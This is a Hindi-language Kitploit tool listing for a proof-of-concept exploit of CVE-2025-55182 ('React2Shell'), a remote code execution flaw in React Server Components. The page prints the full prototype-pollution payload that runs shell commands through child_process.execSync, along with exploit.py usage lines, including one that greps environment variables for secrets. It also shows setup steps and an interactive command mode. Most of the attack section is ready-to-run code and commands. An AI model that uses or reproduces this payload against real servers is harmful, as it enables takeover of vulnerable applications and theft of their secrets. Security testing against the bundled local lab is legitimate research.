Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
EXPLOIT-CVE-2025-55182 — CVE-2025-55182 (React2Shell) के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, जो React Server Components में प्रोटोटाइप प्रदूषण के माध्यम से एक गंभीर RCE भेद्यता है। इसमें इंटरैक्टिव और कमांड-लाइन शोषण मोड शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/joaovicdev/exploit-cve-2025-55182
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंगपेलोड डेवलपमेंट
GitHubjoaovicdev/exploit-cve-2025-55182

EXPLOIT-CVE-2025-55182

CVE-2025-55182 (React2Shell) के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, जो React Server Components में प्रोटोटाइप प्रदूषण के माध्यम से एक गंभीर RCE भेद्यता है। इसमें इंटरैक्टिव और कमांड-लाइन शोषण मोड शामिल हैं।

रिपॉजिटरी देखें
5 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55182 प्रमाण अवधारणा

CVE-2025-55182 React

अवलोकन

CVE-2025-55182 (React2Shell) का एक व्यावहारिक प्रदर्शन - React सर्वर घटकों में एक गंभीर RCE भेद्यता।

भेद्यता विवरण

  • CVE ID: CVE-2025-55182
  • प्रकार: प्रोटोटाइप प्रदूषण के माध्यम से दूरस्थ कोड निष्पादन
  • CVSS: 9.8 (गंभीर)
  • प्रभावित: React 19.0.0, 19.1.0, 19.1.1, 19.2.0

हमला वेक्टर

React सर्वर घटक FormData को असुरक्षित रूप से डिसीरियलाइज़ करते हैं। विशेष रूप से तैयार किए गए मल्टीपार्ट फ़ील्ड प्रोटोटाइप प्रदूषण को ट्रिगर करते हैं और child_process.execSync के माध्यम से मनमाना कोड निष्पादित करते हैं।


त्वरित सेटअप

root@kitploit:~
npm install
pip3 install requests
npm run dev

एप्लिकेशन इस पते पर चलता है: http://localhost:3000


शोषण

मूल उपयोग

root@kitploit:~
python3 exploit.py -c "whoami"

कमांड उदाहरण

root@kitploit:~
python3 exploit.py -c "whoami"
python3 exploit.py -c "pwd"
python3 exploit.py -c "ls -la"
python3 exploit.py -c "cat package.json"
python3 exploit.py -c "env | grep SECRET"

इंटरैक्टिव मोड

root@kitploit:~
python3 exploit.py -i
root@kitploit:~
> whoami
COMMAND RESULT:
your-username
============================================================

> pwd
COMMAND RESULT:
/path/to/project
============================================================

> exit

यह कैसे काम करता है

पेलोड संरचना

root@kitploit:~
{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('CMD',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {"get": "$1:constructor:constructor"}
  }
}

परीक्षण

टर्मिनल 1: सर्वर प्रारंभ करें

root@kitploit:~
npm run dev

टर्मिनल 2: शोषण चलाएँ

root@kitploit:~
python3 exploit.py -c "whoami"

वर्बोज़ मोड

root@kitploit:~
python3 exploit.py -c "whoami" -v

पूर्ण पेलोड संरचना और सर्वर प्रतिक्रिया दिखाता है


संदर्भ

  • CVE-2025-55182 - NVD
  • React सुरक्षा
  • OWASP डिसीरियलाइज़ेशन

द्वारा: Guaxinim | साइबर सुरक्षा अनुसंधान

टूल डाउनलोड करें